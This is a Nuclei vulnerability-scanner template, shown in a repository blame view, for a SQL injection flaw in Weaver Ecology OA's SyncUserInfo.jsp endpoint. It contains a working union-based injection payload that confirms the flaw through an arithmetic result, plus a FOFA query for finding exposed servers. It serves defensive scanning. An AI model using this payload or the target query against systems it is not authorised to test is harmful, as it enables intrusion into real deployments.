nuclei-templates/vulnerabilities/other/ecology-syncuserinfo-sqli.yaml

31 lines
623 B
YAML
Raw Normal View History

2022-04-06 08:55:59 +00:00
id: ecology-syncuserinfo-sqli
2022-04-06 08:55:59 +00:00
info:
name: Ecology Syncuserinfo Sqli
author: ritikchaddha
severity: high
reference:
- https://www.weaver.com.cn/
metadata:
fofa-query: app="泛微-协同办公OA"
2022-04-07 13:10:03 +00:00
tags: ecology,sqli
2022-04-07 13:12:11 +00:00
2022-04-06 08:55:59 +00:00
requests:
- method: GET
path:
2022-04-07 13:10:03 +00:00
- "{{BaseURL}}/mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str(98989*44313),null"
2022-04-06 08:55:59 +00:00
redirects: true
2022-04-07 13:12:11 +00:00
max-redirects: 2
2022-04-06 08:55:59 +00:00
matchers-condition: and
matchers:
- type: word
part: body
2022-04-07 13:10:03 +00:00
words:
- "4386499557"
2022-04-06 08:55:59 +00:00
- type: status
status:
- 200